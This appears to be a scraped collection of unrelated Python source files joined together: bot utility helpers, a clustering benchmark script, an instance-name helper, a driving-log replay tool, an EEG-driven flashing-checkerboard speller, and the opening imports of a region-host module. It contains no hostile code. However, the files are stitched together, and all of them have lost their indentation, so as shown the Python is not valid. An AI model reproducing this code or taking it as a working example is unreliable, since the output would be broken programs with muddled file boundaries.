:param text: The text to split
:param chars_per_string: The number of characters per line the text is split into.
:return: The splitted text as a list of strings.
"""
return [text[i:i + chars_per_string] for i in range(0, len(text), chars_per_string)]
# CREDITS TO http://stackoverflow.com/questions/12317940#answer-12320352
def or_set(self):
self._set()
self.changed()
def or_clear(self):
self._clear()
self.changed()
def orify(e, changed_callback):
if not hasattr(e, "_set"):
e._set = e.set
if not hasattr(e, "_clear"):
e._clear = e.clear
e.changed = changed_callback
e.set = lambda: or_set(e)
e.clear = lambda: or_clear(e)
def OrEvent(*events):
or_event = threading.Event()
def changed():
bools = [ev.is_set() for ev in events]
if any(bools):
or_event.set()
else:
or_event.clear()
def busy_wait():
while not or_event.is_set():
or_event._wait(3)
for e in events:
orify(e, changed)
or_event._wait = or_event.wait
or_event.wait = busy_wait
changed()
return or_event
def extract_arguments(text):
"""
Returns the argument after the command.
Examples:
extract_arguments("/get name"): 'name'
extract_arguments("/get"): ''
extract_arguments("/get@botName name"): 'name'
:param text: String to extract the arguments from a command
:return: the arguments if `text` is a command (according to is_command), else None.
"""
regexp = re.compile(r"/\w*(@\w*)*\s*([\s\S]*)",re.IGNORECASE)
result = regexp.match(text)
return result.group(2) if is_command(text) else None
def per_thread(key, construct_value, reset=False):
if reset or not hasattr(thread_local, key):
value = construct_value()
setattr(thread_local, key, value)
return getattr(thread_local, key)
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
# https://stackoverflow.com/a/312464/9935473
for i in range(0, len(lst), n):
yield lst[i:i + n]
def generate_random_token():
return ''.join(random.sample(string.ascii_letters, 16))
def deprecated(func):
"""This is a decorator which can be used to mark functions
as deprecated. It will result in a warning being emitted
when the function is used."""
# https://stackoverflow.com/a/30253848/441814
@functools.wraps(func)
def new_func(*args, **kwargs):
warnings.simplefilter('always', DeprecationWarning) # turn off filter
warnings.warn("Call to deprecated function {}.".format(func.__name__),
category=DeprecationWarning,
stacklevel=2)
warnings.simplefilter('default', DeprecationWarning) # reset filter
return func(*args, **kwargs)
return new_func
|
experiments_mp.py
|
# -*- coding: utf-8 -*-
"""
This module was created for testing initial benchmarks of the various
clustering approaches.
"""
import numpy as np
import os
from sklearn import metrics
from time import time
from dkmeans.data import get_dataset
from dkmeans.data import DEFAULT_DATASET, DEFAULT_THETA, DEFAULT_WINDOW
from dkmeans.data import DEFAULT_M, DEFAULT_N
from dkmeans.data import choose_best_centroids
from dkmeans.metrics import average_distance
import dkmeans.singleshot as dkss
import dkmeans.multishot as dkms
import dkmeans.kmeans_pooled as kp
from multiprocessing import Process, Queue
METHODS = {
'pooled': (kp.main, {}),
#'singleshot_lloyd': (dkss.main, {'optimization': 'lloyd'}),
#'singleshot_gradient': (dkss.main, {'optimization': 'gradient'}),
#'multishot_lloyd': (dkms.main, {'optimization': 'lloyd'}),
#'multishot_gradient': (dkms.main, {'optimization': 'gradient'}),
} # STORES the method mains and the kwarg for the corresponding opt
METHOD_NAMES = METHODS.keys()
METRICS = { 'silhouette': metrics.silhouette_score,
#'avg_dist': average_distance,
}
METRIC_NAMES = METRICS.keys()
DEFAULT_METHOD = "pooled"
DEFAULT_VERBOSE = True
def evaluate_metric(X, labels, metric):
"""
More helpful for when we have different choices of metrics
"""
flat_X = [x.flatten() for x in X]
try:
return METRICS[metric](flat_X, np.array(labels))
except ValueError: # TODO - fix this...
if len(set(labels)) == 1:
print(labels)
print("Bad Clustering - all labels assigned to one cluster")
return -1
def run_method(X, k, method=DEFAULT_METHOD, subjects=None, **kwargs):
"""
Run a given method by name
"""
# print("Running Method %s" % method)
start = time()
if 'init_centroids' in kwargs.keys() and type(
kwargs['init_centroids']) is dict:
kwargs['init_centroids'] = kwargs['init_centroids'][method]
res = METHODS[method][0](X, k, **METHODS[method][1], **kwargs)
# print(res)
end = time()
res['rtime'] = end - start
res['subjects'] = subjects
return res
def run_experiment(k, N, dataset=DEFAULT_DATASET, theta=DEFAULT_THETA,
dfnc_window=DEFAULT_WINDOW, m=DEFAULT_M, n=DEFAULT_N,
metrics=METRIC_NAMES,
methods=METHOD_NAMES, **kwargs):
"""
Run an experiment with a particular choice of
1. Data set
2. Data Parameters k, n, theta, dfnc_window, m, n
3. metric
4. method
5. Method parameters passed in kwargs
"""
subjects = None
X, subjects = get_dataset(N, dataset=dataset, theta=theta,
dfnc_window=dfnc_window, m=m, n=n)
res = {method: run_method(X, k, subjects=subjects, method=method, **kwargs)
for method in methods}
measures = {res[r]['name']: {metric: evaluate_metric(res[r]['X'],
res[r]['cluster_labels'], metric)
for metric in metrics} for r in res}
return measures, res
def run_repeated_experiment_mp(R, k, N, metrics=METRIC_NAMES,
methods=METHOD_NAMES, **kwargs):
"""
Run repeated experiments - this function may be unnecesarry and
cluttered?
"""
measures = {method: {metric: [] for metric in metrics}
for method in methods}
results = {method: [] for method in methods}
processes = []
queues = []
for r in range(R):
q = Queue()
p = Process(target=one_run_exp, args=(q, k, N, metrics,
methods, ), kwargs=kwargs)
p.start()
processes.append(p)
queues.append(q)
for i, pq in enumerate(zip(processes, queues)):
p, q = pq
meas, res = q.get()
p.join()
for method in methods:
results[method] += [res[method]]
for metric in metrics:
measures[method][metric] += [meas[method][metric]]
return measures, results
def run_repeated_experiment(R, k, N, metrics=METRIC_NAMES,
methods=METHOD_NAMES, **kwargs):
"""
Run repeated experiments - this function may be unnecesarry and
cluttered?
"""
measures = {method: {metric: [] for metric in metrics}
for method in methods}
results = {method: [] for method in methods}
for r in range(R):
meas, res = one_run_exp(None, k, N, metrics, methods, **kwargs)
print("Printing Results k=%d, R=%d, N=%d in process %s" %
(k, R, N, os.getpid()))
for method in meas:
for measure in meas[method]:
print('\t%s, %s: %s' % (method, measure,
np.max(meas[method][measure])))
for method in methods:
results[method] += [res[method]]
for metric in metrics:
measures[method][metric] += [meas[method][metric]]
return measures, results
def one_run_exp(q, k, N, metrics, methods, **kwargs):
np.random.seed(seed=int(str(os.getpid())))
meas, res = run_experiment(k, N, metrics=metrics, methods=methods,
**kwargs)
if q is not None:
q.put([meas, res])
return meas, res
# print("Done with experiment k=%d, N=%d in process %s" %
# (k, N, os.getpid()))
def dfnc_pipe(k, N, R, s=2, rep=100):
print("Running dFNC exemplars k=%d, R=%d, N=%d, s=%d in process %s" %
(k, rep, N, s, os.getpid()))
meas, res = run_repeated_experiment_mp(rep, k, N,
dataset='real_fmri_exemplar',
s=s,
verbose=True)
for method in meas:
print("saving exemplars")
np.save('results/exemplar_N%d_s%d_k%d_%s_meas.npy' %
(N, s, k, method), meas)
np.save('results/exemplar_N%d_s%d_k%d_%s_res.npy' %
(N, s, k, method), res)
print("Printing Exemplar Results k=%d, R=%d, N=%d in process %s" %
(k, rep, N, os.getpid()))
for method in meas:
for measure in meas[method]:
print('\t%s, %s: %s' % (method, measure,
np.max(meas[method][measure])))
for method in meas:
exemplars = choose_best_centroids('results/exemplar_N%d_s%d_k%d_%s_res.npy'
% (N, s, k, method),
'results/exemplar_N%d_s%d_k%d_%s_meas.npy'
% (N, s, k, method),
list(meas.keys()))
print("Running dFNC second stage k=%d, R=%d, N=%d in process %s" %
(k, R, N, os.getpid()))
measR, resR = run_repeated_experiment_mp(1, k, N,
dataset='real_fmri',
verbose=True,
s=s,
init_centroids=exemplars)
print("Saving measure results")
np.save('results/fbirn_N%d_s%d_k%d_%s_meas.npy' %
(N, s, k, method), measR)
print("Saving results")
np.save('results/fbirn_N%d_s%d_k%d_%s_res.npy' %
(N, s, k, method), resR)
print("Printing Second Stage Results k=%d, R=%d, N=%d in process %s" %
(k, R, N, os.getpid()))
for method in measR:
for measure in measR[method]:
print('\t%s, %s: %s' % (method, measure,
np.max(measR[method][measure])))
def main():
"""Run a suite of experiments in order"""
# datar = [ # 'gaussian',
# 'iris',
# 'simulated_fmri',
# 'real_fmri_exemplar'
# ] # datasets to run
R = 5 # Number of repetitions
N = 314 # Number of samples
# Oth experiment is gaussian set with known number of clusters, 3,
'''
print("Running known K experiment")
theta = [[-1, 0.5], [1, 0.5], [2.5, 0.5]]
meas, res = run_repeated_experiment(R, 3, N, theta=theta, verbose=True,
dataset='gaussian')
np.save('repeat_known_k_meas.npy', meas)
np.save('repeat_known_k_res.npy', res)
'''
# First experiment is increasing k
# measure the scores and iterations, no runtimes
'''
print("Running increasing K experiment")
k_test = range(4, 5)
for k in k_test:
for d in datar:
print("K: %d; Dataset %s" % (k, d))
meas, res = run_repeated_experiment(R, k, N,
dataset=d, verbose=False)
np.save('results/d%s_k%d_meas.npy' % (d, k), meas)
np.save('results/d%s_k%d_res.npy' % (d, k), res)
'''
# Second experiment is increasing N with fixed k
# Measure the number of iterations and the runtime and the scores
# TODO: Implement this
# Third experiment is Increasing number of subjects in simulated
# Real fMRI data
# TODO: Implement this
# Experiment with 300 subjects, 30 sites
print("Running K experiment dFNC pipeline")
s = 2
#processes = []
dfnc_pipe(5, N, R, s)
# for k in k_test:
# p = Process(target=dfnc_pipe, args=(k, N, R, s))
# p.start()
# processes.append(p)
# for p in processes:
# p.join()
if __name__ == '__main__':
# TODO Arg-Parsing
main()
|
_instanceinfo.py
|
# -*- coding: utf-8 -*-
"""
INSTANCE INFO:
-----------------
This module is a copy of the code created by TheoRet at StackOverflow
TheoRet profile:
https://stackoverflow.com/users/7386061/theoret
Link to the question/answer:
https://stackoverflow.com/questions/1690400/getting-an-instance-name-inside-class-init/49331683#49331683
"""
import time
import traceback
import threading
class InstanceCreationError(Exception):
pass
class RememberInstanceCreationInfo:
def __init__(self):
for frame, _ in traceback.walk_stack(None):
varnames = frame.f_code.co_varnames
if varnames is ():
break
if frame.f_locals[varnames[0]] not in (self, self.__class__):
break
# if the frame is inside a method of this instance,
# the first argument usually contains either the instance or
# its class
# we want to find the first frame, where this is not the case
else:
raise InstanceCreationError("No suitable outer frame found.")
self._outer_frame = frame
self.creation_module = frame.f_globals["__name__"]
self.creation_file, self.creation_line, self.creation_function, \
self.creation_text = \
traceback.extract_stack(frame, 1)[0]
self.creation_name = self.creation_text.split("=")[0].strip()
super().__init__()
# threading.Thread(target=self._check_existence_after_creation).start()
def _check_existence_after_creation(self):
while self._outer_frame.f_lineno == self.creation_line:
time.sleep(0.01)
# this is executed as soon as the line number changes
# now we can be sure the instance was actually created
error = InstanceCreationError(
"\nCreation name not found in creation frame.\ncreation_file: "
"%s \ncreation_line: %s \ncreation_text: %s\ncreation_name ("
"might be wrong): %s" % (
self.creation_file, self.creation_line, self.creation_text,
self.creation_name))
nameparts = self.creation_name.split(".")
try:
var = self._outer_frame.f_locals[nameparts[0]]
except KeyError:
raise error
finally:
del self._outer_frame
# make sure we have no permanent inter frame reference
# which could hinder garbage collection
try:
for name in nameparts[1:]:
var = getattr(var, name)
except AttributeError:
raise error
if var is not self:
raise error
def __repr__(self):
return super().__repr__()[
:-1] + " with creation_name '%s'>" % self.creation_name
|
regen.py
|
#!/usr/bin/env python3
import os
import time
import multiprocessing
from tqdm import tqdm
import argparse
# run DM procs
os.environ["USE_WEBCAM"] = "1"
import cereal.messaging as messaging
from cereal.services import service_list
from cereal.visionipc.visionipc_pyx import VisionIpcServer, VisionStreamType # pylint: disable=no-name-in-module, import-error
from common.params import Params
from common.realtime import Ratekeeper, DT_MDL, DT_DMON
from common.transformations.camera import eon_f_frame_size, eon_d_frame_size
from selfdrive.car.fingerprints import FW_VERSIONS
from selfdrive.manager.process import ensure_running
from selfdrive.manager.process_config import managed_processes
from selfdrive.test.update_ci_routes import upload_route
from tools.lib.route import Route
from tools.lib.framereader import FrameReader
from tools.lib.logreader import LogReader
process_replay_dir = os.path.dirname(os.path.abspath(__file__))
FAKEDATA = os.path.join(process_replay_dir, "fakedata/")
def replay_service(s, msgs):
pm = messaging.PubMaster([s, ])
rk = Ratekeeper(service_list[s].frequency, print_delay_threshold=None)
smsgs = [m for m in msgs if m.which() == s]
while True:
for m in smsgs:
# TODO: use logMonoTime
pm.send(s, m.as_builder())
rk.keep_time()
vs = None
def replay_cameras(lr, frs):
cameras = [
("roadCameraState", DT_MDL, eon_f_frame_size, VisionStreamType.VISION_STREAM_YUV_BACK),
("driverCameraState", DT_DMON, eon_d_frame_size, VisionStreamType.VISION_STREAM_YUV_FRONT),
]
def replay_camera(s, stream, dt, vipc_server, fr, size):
pm = messaging.PubMaster([s, ])
rk = Ratekeeper(1 / dt, print_delay_threshold=None)
img = b"\x00" * int(size[0]*size[1]*3/2)
while True:
if fr is not None:
img = fr.get(rk.frame % fr.frame_count, pix_fmt='yuv420p')[0]
img = img.flatten().tobytes()
rk.keep_time()
m = messaging.new_message(s)
msg = getattr(m, s)
msg.frameId = rk.frame
pm.send(s, m)
vipc_server.send(stream, img, msg.frameId, msg.timestampSof, msg.timestampEof)
# init vipc server and cameras
p = []
global vs
vs = VisionIpcServer("camerad")
for (s, dt, size, stream) in cameras:
fr = frs.get(s, None)
vs.create_buffers(stream, 40, False, size[0], size[1])
p.append(multiprocessing.Process(target=replay_camera,
args=(s, stream, dt, vs, fr, size)))
# hack to make UI work
vs.create_buffers(VisionStreamType.VISION_STREAM_RGB_BACK, 4, True, eon_f_frame_size[0], eon_f_frame_size[1])
vs.start_listener()
return p
def regen_segment(lr, frs=None, outdir=FAKEDATA):
lr = list(lr)
if frs is None:
frs = dict()
# setup env
params = Params()
params.clear_all()
params.put_bool("Passive", False)
params.put_bool("OpenpilotEnabledToggle", True)
params.put_bool("CommunityFeaturesToggle", True)
params.put_bool("CommunityFeaturesToggle", True)
cal = messaging.new_message('liveCalibration')
cal.liveCalibration.validBlocks = 20
cal.liveCalibration.rpyCalib = [0.0, 0.0, 0.0]
params.put("CalibrationParams", cal.to_bytes())
os.environ["LOG_ROOT"] = outdir
os.environ["SIMULATION"] = "1"
os.environ['SKIP_FW_QUERY'] = ""
os.environ['FINGERPRINT'] = ""
for msg in lr:
if msg.which() == 'carParams':
car_fingerprint = msg.carParams.carFingerprint
if len(msg.carParams.carFw) and (car_fingerprint in FW_VERSIONS):
params.put("CarParamsCache", msg.carParams.as_builder().to_bytes())
else:
os.environ['SKIP_FW_QUERY'] = "1"
os.environ['FINGERPRINT'] = car_fingerprint
#TODO: init car, make sure starts engaged when segment is engaged
fake_daemons = {
'sensord': [
multiprocessing.Process(target=replay_service, args=('sensorEvents', lr)),
],
'pandad': [
multiprocessing.Process(target=replay_service, args=('can', lr)),
multiprocessing.Process(target=replay_service, args=('pandaState', lr)),
],
#'managerState': [
# multiprocessing.Process(target=replay_service, args=('managerState', lr)),
#],
'thermald': [
multiprocessing.Process(target=replay_service, args=('deviceState', lr)),
],
'camerad': [
*replay_cameras(lr, frs),
],
# TODO: fix these and run them
'paramsd': [
multiprocessing.Process(target=replay_service, args=('liveParameters', lr)),
],
'locationd': [
multiprocessing.Process(target=replay_service, args=('liveLocationKalman', lr)),
],
}
try:
# start procs up
ignore = list(fake_daemons.keys()) + ['ui', 'manage_athenad', 'uploader']
ensure_running(managed_processes.values(), started=True, not_run=ignore)
for procs in fake_daemons.values():
for p in procs:
p.start()
for _ in tqdm(range(60)):
# ensure all procs are running
for d, procs in fake_daemons.items():
for p in procs:
if not p.is_alive():
raise Exception(f"{d}'s {p.name} died")
time.sleep(1)
finally:
# kill everything
for p in managed_processes.values():
p.stop()
for procs in fake_daemons.values():
for p in procs:
p.terminate()
r = params.get("CurrentRoute", encoding='utf-8')
return os.path.join(outdir, r + "--0")
def regen_and_save(route, sidx, upload=False, use_route_meta=True):
if use_route_meta:
r = Route(args.route)
lr = LogReader(r.log_paths()[args.seg])
fr = FrameReader(r.camera_paths()[args.seg])
else:
lr = LogReader(f"cd:/{route.replace('|', '/')}/{sidx}/rlog.bz2")
fr = FrameReader(f"cd:/{route.replace('|', '/')}/{sidx}/fcamera.hevc")
rpath = regen_segment(lr, {'roadCameraState': fr})
relr = os.path.relpath(rpath)
print("\n\n", "*"*30, "\n\n")
print("New route:", relr, "\n")
if upload:
upload_route(relr)
return relr
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Generate new segments from old ones")
parser.add_argument("--upload", action="store_true", help="Upload the new segment to the CI bucket")
parser.add_argument("route", type=str, help="The source route")
parser.add_argument("seg", type=int, help="Segment in source route")
args = parser.parse_args()
regen_and_save(args.route, args.seg, args.upload)
|
eegInterface.py
|
# eegInterface.py
#
# Creates a keyboard made of flashing checkerboxes which can
# selected by the user looking and concentrating on an individual box
# A baseline is recorded for first 30s. The EEG data is compared against
# the baseline data to determine if user if looking at a certain box
# Author: Ronan Byrne
# Last Updated: 09/05/2018
#
from psychopy import visual, event
import numpy as np
import scipy.stats as st
import threading
# Interface arguments
window_size = [1200, 700]
checker_cycles = 4 # Number of times texture repeats in box
checker_size = 160
checker_tex = np.array([[1, -1], [-1, 1]]) # One black and one white box
checker_frequency = np.array([10, 20, 15, 5, 12]) # Flashing Frequencies
special_text = 'SPECIAL'
num_text = 'NUM'
text_boxes = [
['A', 'B', 'C', 'D', 'E'],
['F', 'G', 'H', 'I', 'J'],
['K', 'L', 'M', 'N', 'O'],
['P', 'Q', 'R', 'S', 'T'],
['U', 'V', 'W', 'X', 'Y', 'Z', num_text, special_text]
]
num_boxes = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
enter_text = 'ENTER'
del_text = 'DEL'
space_text = 'SPACE'
special_boxes = [space_text, '.', '?', enter_text, del_text]
class BCI(object):
def __init__(self, win_size, freq_array, checker_size, checker_cycles, checker_tex, pipe):
self.pipe = pipe
self.win_size = win_size
self.win = visual.Window(self.win_size,
units='pix',
monitor='testMonitor',
)
self.mouse = event.Mouse(win=self.win)
self.tex = checker_tex
self.checker_size = checker_size
self.checker_cycles = checker_cycles
self.freq_array = freq_array
self.stim = []
self.selection_boxes = []
self.xy = []
self.top_level_boxes = text_boxes
# create checker boxes and text above boxes
# Some magic numbers here for the positions, not fully customisable
for i in range(len(self.top_level_boxes)):
self.xy.append([i * 220 - self.win_size[0] / 2 + self.checker_size,
-self.win_size[1] / 2 + 0.75 * self.checker_size +
(not ((i + 1) % 2)) * (1.5 * self.checker_size)])
self.stim.append(visual.GratingStim(self.win,
tex=self.tex,
size=self.checker_size,
units='pix',
sf=self.checker_cycles / self.checker_size,
pos=self.xy[i]))
self.selection_boxes.append(visual.TextStim(self.win,
text=','.join(self.top_level_boxes[i]),
pos=[self.stim[i].pos[0], self.stim[i].pos[1]
+ 0.60 * self.checker_size]))
self.num_of_stim = len(self.stim)
self.instructions_text1 = 'Recording Baseline, please stare into the center box until it starts flashing'
self.instructions_text2 = 'Stare into the center of the box which corresponds to the character ' \
'you want to choose'
self.instructions_box_update = False
# TextStim is slower than TextBox but TextBox was unreliable
self.instructions_box = visual.TextStim(self.win,
text=self.instructions_text1,
pos=[0, self.win_size[1] / 2 - 50],
alignHoriz='center',
alignVert='center')
# White rectangle for textbox
self.entered_background = visual.Rect(self.win,
units='pix',
width=self.win_size[0]/2,
height=40,
fillColor=[1, 1, 1],
pos=[0, self.instructions_box.pos[1] - 75])
# Textbox text
self.entered_textbox = visual.TextStim(self.win,
text='|',
color=[-1, -1, -1],
pos=[self.entered_background.pos[0], self.entered_background.pos[1]],
alignHoriz='center',
alignVert='center')
# Green box to outline which box was selected
self.selected_box = visual.Rect(self.win,
units='pix',
width=self.checker_size,
height=self.checker_size,
lineWidth=40,
lineColor=[-1, 1, -1],
fillColor=None,
pos=[0, 0] # will be changed when used
)
# Number of frames the green box is shown for
self.selected_box_on_frames = 30
self.selected_box_frames = 0
self.selected_index = -1
# Average Frame rate
self.frame_rate = self.win.getActualFrameRate()
self.frame_interval = 1 / self.frame_rate
# The time interval for each box
self.interval = 1 / self.freq_array
# Number of frames each checker box is shown
self.stim_frames = np.round(self.interval / self.frame_interval)
print("Frame rate is {0}. Actual Flashing Frequency will be {1}".format(self.frame_rate, str(
1 / (self.stim_frames * self.frame_interval))))
self.box_selected = False
# Flag for if we are in the bottom level of the selection tree
self.bottom_level = False
self.baseline_count = 0
self.pipe_thread = threading.Thread(target=self.pipeReceive, daemon=True)
if self.pipe is not None:
self.setting_baseline = True
self.pipe_thread.start()
self.start()
else:
self.setting_baseline = False
def start(self):
self.mouse.clickReset()
self.win.flip()
frame_count = 0
while not event.getKeys('escape'):
# If 'b' pressed, recorded baseline again
if event.getKeys('b') and self.pipe is not None:
self.setting_baseline = True
self.baseline_count = 0
self.instructions_box.text = self.instructions_text1
self.instructions_box_update = True
self.entered_textbox.text = '|'
# If not recording baseline, check if any boxes were selected or need to be updated
if not self.setting_baseline:
# Check if the left button was clicked and a box is not already selected
if self.mouse.getPressed().count(1) and (self.selected_index == -1):
self.mouse.clickReset()
pos = self.mouse.getPos()
# Check if the mouse was clicked inside one of the boxes
for i in range(self.num_of_stim):
if self.stim[i].contains(pos):
self.selected_index = i
self.selected_box.pos = self.stim[self.selected_index].pos
self.selected_box_frames = self.selected_box_on_frames
self.selected_box.draw()
break
# A Box was selected, redraw
elif self.selected_index is not -1:
self.selected_box.draw()
self.selected_box_frames -= 1
# Last redraw of selection box, update boxes with new selection
if self.selected_box_frames <= 0:
self.update_selection()
# Check if any of the checker boards need to be updated
for i, x in enumerate(self.stim_frames):
if (frame_count % x) == 0:
# Swap checkerboard pattern
self.stim[i].tex = -self.stim[i].tex
# Update all things on screen
self.draw_screen()
# win.flip() blocks until the screen fresh so is used to count number of frames passed
self.win.flip()
frame_count += 1
# Group choices together
def group_choices(self, boxes):
# Selection boxes can hold 1-4 values each
boxes_len = len(boxes)
if boxes_len / 2 <= self.num_of_stim:
j_max = 2
elif boxes_len / 3 <= self.num_of_stim:
j_max = 3
elif boxes_len / 4 <= self.num_of_stim:
j_max = 4
else:
print("unsupported length, resetting to top level")
self.reset_to_top_level()
return
offset = 0
# Update boxes with new selections
for i in range(0, self.num_of_stim):
self.selection_boxes[i].text = ''
for j in range(j_max):
try:
self.selection_boxes[i].text += (boxes[i + j + offset] + ',')
except:
# reach end of selections, remove ',' from last box
self.selection_boxes[i].text = self.selection_boxes[i].text[:-1]
break
offset += 1
# remove ',' from end of each box selection
self.selection_boxes[i].text = self.selection_boxes[i].text[:-1]
# Reset the selection to the top level
def reset_to_top_level(self):
self.bottom_level = False
for i, x in enumerate(self.stim):
self.selection_boxes[i].text = ','.join(self.top_level_boxes[i])
self.selection_boxes[i].draw()
# draw everything on screen
def draw_screen(self):
for i, x in enumerate(self.stim):
self.stim[i].draw()
self.selection_boxes[i].draw()
if self.instructions_box_update:
self.instructions_box.text = self.instructions_text2
self.instructions_box_update = False
self.instructions_box.draw()
self.entered_background.draw()
self.entered_textbox.draw()
# Update the screen with new selections
def update_selection(self):
# Not to the lowest level selection
if not self.bottom_level:
# cant display all element with each box
if len(self.selection_boxes[self.selected_index].text.split(',')) > self.num_of_stim:
self.group_choices(self.selection_boxes[self.selected_index].text.split(','))
# Non empty selection which can be split into max boxes or less
elif len(self.selection_boxes[self.selected_index].text) > 1:
temp_text = self.selection_boxes[self.selected_index].text.split(',')
self.bottom_level = True
# Place one choice in each box
for i in range(self.num_of_stim):
try:
self.selection_boxes[i].text = temp_text[i]
except:
# No more text to display, rest of boxes will have no text
self.selection_boxes[i].text = ''
self.selection_boxes[i].draw()
# Empty box chosen, reset to top level
elif len(self.selection_boxes[self.selected_index].text) == 0:
print("Empty box chosen, resetting to top level")
self.reset_to_top_level()
else:
print("Unknown state, resetting")
self.reset_to_top_level()
# Bottom level selection
else:
temp_boxes = []
# Non single character selection
if len(self.selection_boxes[self.selected_index].text) > 1:
# Special selection choices
# NUM box was chosen
if self.selection_boxes[self.selected_index].text == num_text:
temp_boxes = num_boxes
if len(temp_boxes) > self.num_of_stim:
self.group_choices(temp_boxes)
self.bottom_level = False
# SPECIAL box was chosen
elif self.selection_boxes[self.selected_index].text == special_text:
temp_boxes = special_boxes
if len(temp_boxes) > self.num_of_stim:
self.group_choices(temp_boxes)
self.bottom_level = False
# ENTER box was chosen
elif self.selection_boxes[self.selected_index].text == enter_text:
self.bottom_level = False
self.entered_textbox.text = '|'
# TODO something on enter
# DEL box was chosen
elif self.selection_boxes[self.selected_index].text == del_text:
self.bottom_level = False
self.entered_textbox.text = self.entered_textbox.text[:-1]
# SPACE was chosen
elif self.selection_boxes[self.selected_index].text == space_text:
self.bottom_level = False
self.entered_textbox.text += ' '
else:
print('Unknown case, reseting to top level')
self.bottom_level = False
# Display bottom level selection
if self.bottom_level:
for i in range(self.num_of_stim):
try:
self.selection_boxes[i].text = temp_boxes[i]
except:
self.selection_boxes[i].text = ''
self.selection_boxes[i].draw()
else:
# something was selected and there was no sub-level
# reset selection to top level
if len(temp_boxes) == 0:
self.reset_to_top_level()
# Empty box chosen, reset to top level
elif len(self.selection_boxes[self.selected_index].text) == 0:
print("Empty box chosen, resetting to top level")
self.reset_to_top_level()
# Single character selection
else:
# Remove cursor
if self.entered_textbox.text is '|':
self.entered_textbox.text = self.selection_boxes[self.selected_index].text
# Append selection
else:
self.entered_textbox.text += self.selection_boxes[self.selected_index].text
self.reset_to_top_level()
self.selected_index = -1
def pipeReceive(self):
# TODO receive initial parameters through pipe
fft_padding = 5 # pad fft with 5 times the length
window_len = 1000 # fft window size
recv_window_len = 1000 # size of data sent through pipe
fs = 1000
cdf_per = 10.0 # 10% probability from cumulative density function
max_baseline_time = 30 # time to get baseline
max_baseline_count = int(max_baseline_time*fs/window_len)
ham = np.hamming(window_len)
# Frequency points from fft
freq_axis = np.fft.rfftfreq(window_len * fft_padding, 1 / fs)
signal_buff = np.zeros(window_len)
freq_array_len = len(self.freq_array)
# Signal magnitude for each fft
freq_sig_snr = np.zeros([freq_array_len, 2])
# SNR of last two fft
freq_sig_mean_snr = np.zeros([freq_array_len, 1])
# Baseline magnitude of each frequencies
freq_sig_base_val = np.zeros([freq_array_len, max_baseline_count])
# Signal threshold which is 10% or less probablitiy
freq_sig_val_thresh = np.zeros([freq_array_len, 1])
# Freq tolerance to check magnitude
freq_tol = 0
while True:
# Read in data from pipe, pipe.recv blocks until data is received
for i in range(int(window_len/recv_window_len)):
signal_buff[i*recv_window_len:i*recv_window_len+recv_window_len] = self.pipe.recv()
y_ham = signal_buff * ham
# Calculate fft assuming signal is real, returns first half of spectrum
rfft = np.fft.rfft(y_ham, window_len * fft_padding)
# Calculate magnitude
rfft_mag = 4 / window_len * np.absolute(rfft)
# loop through each frequency calculating maximum magnitude within the freq tol
for index, f in enumerate(self.freq_array):
freq_start = f - freq_tol
freq_end = f + freq_tol
freq_max = 0
for i in range(0, len(freq_axis)):
if freq_axis[i] >= freq_start:
if rfft_mag[i] > freq_max:
freq_max = rfft_mag[i]
if freq_axis[i] >= freq_end:
if self.setting_baseline:
# Add max value to baseline array for later
freq_sig_base_val[index][self.baseline_count] = freq_max
else:
# Only save value is greater than threshold
if freq_sig_val_thresh[index] < freq_max:
freq_sig_snr[index][1] = freq_max / freq_sig_val_thresh[index]
else:
freq_sig_snr[index][1] = 0
break
if self.setting_baseline:
self.baseline_count += 1
# Enough baseline values
if self.baseline_count == max_baseline_count:
# Calculate gamma cumulative distribution function for each frequency
for i in range(freq_array_len):
std = np.std(freq_sig_base_val[i])
mean = np.mean(freq_sig_base_val[i])
# create a line from the min magnitude to 1.5 * max magnitude
x = np.linspace(min(freq_sig_base_val[i]), max(freq_sig_base_val[i]) * 1.5, 1000)
# Calculate shape, scale and location of gamma distribution
parameters_l = st.gamma.fit(freq_sig_base_val[i])
# Calculate gamma cdf
fitted_cdf = st.gamma.cdf(x, parameters_l[0], parameters_l[1], parameters_l[2])
# Find the point on the cdf where the magnitude is less tha the cdf percent threshold
for j in range(len(x)):
if (1 - fitted_cdf[j]) < (cdf_per / 100.0):
freq_sig_val_thresh[i] = x[j]
break
# if the cdf percent threshold is outside of range, just use 2 standard deviations
if freq_sig_val_thresh[i] == 0:
freq_sig_val_thresh[i] = mean+2*std
print("freq {} mean {}, std {}, thresh {}".format(self.freq_array[i], mean, std,
freq_sig_val_thresh[i]))
freq_sig_snr[i][0] = freq_sig_base_val[i][-1]/freq_sig_val_thresh[i]
self.baseline_count = 0
self.setting_baseline = False
# Have to set a flag here instead of updating because setting the text in
# another thread causes problems
self.instructions_box_update = True
else:
print("freq sig val{}".format(freq_sig_snr.tolist()))
# Loop through frequencies to calculate mean snr
for i in range(freq_array_len):
# If the last two fft snr are not zero, it may be from the stimulus
if freq_sig_snr[i][0] > 0 and freq_sig_snr[i][1] > 0:
freq_sig_mean_snr[i] = np.mean(freq_sig_snr[i])
else:
freq_sig_mean_snr[i] = 0
# shift snr value back
freq_sig_snr[i][0] = freq_sig_snr[i][1]
# Find index of max snr
max_sig_val_index = np.argmax(freq_sig_mean_snr)
# if all snr's are zero, it will return the first in the array
if freq_sig_mean_snr[max_sig_val_index] > 0:
print("max freq snr {}".format(self.freq_array[max_sig_val_index]))
# draw a green box around selected box
self.selected_index = max_sig_val_index
self.selected_box.pos = self.stim[self.selected_index].pos
self.selected_box_frames = self.selected_box_on_frames
self.selected_box.draw()
if __name__ == '__main__':
bci = BCI(win_size=window_size,
freq_array=checker_frequency, checker_cycles=checker_cycles, checker_size=checker_size,
checker_tex=checker_tex, pipe=None)
bci.start()
|
RegionHost.py
|
'''
Created on Jan 24, 2013
@author: mdickson
'''
import sys
import errno
import time
import os.path
import threading
import shlex
import subprocess
import psutil
import Queue
import inworldz.util.provision as provision
import inworldz.util.properties as DefaultProperties
from inworldz.util.filesystem import ConnectUNCShare
from inworldz.util.rdbhost import GetRdbHost, AssignBestRdbHost
import inworldz.maestro.uuid as genuuid
import inworldz.maestro.MaestroStore as store
from inworldz.maestro.ServiceBase import ServiceBase
from inworldz.maestro.MaestroError import ServiceError
from inworldz.maestro.System import Cpu, Disk, Memory, Process
from inworldz.maestro.Region import Region
from inworldz.maestro.GridServices import UserService, MessagingService, ApertureService,\
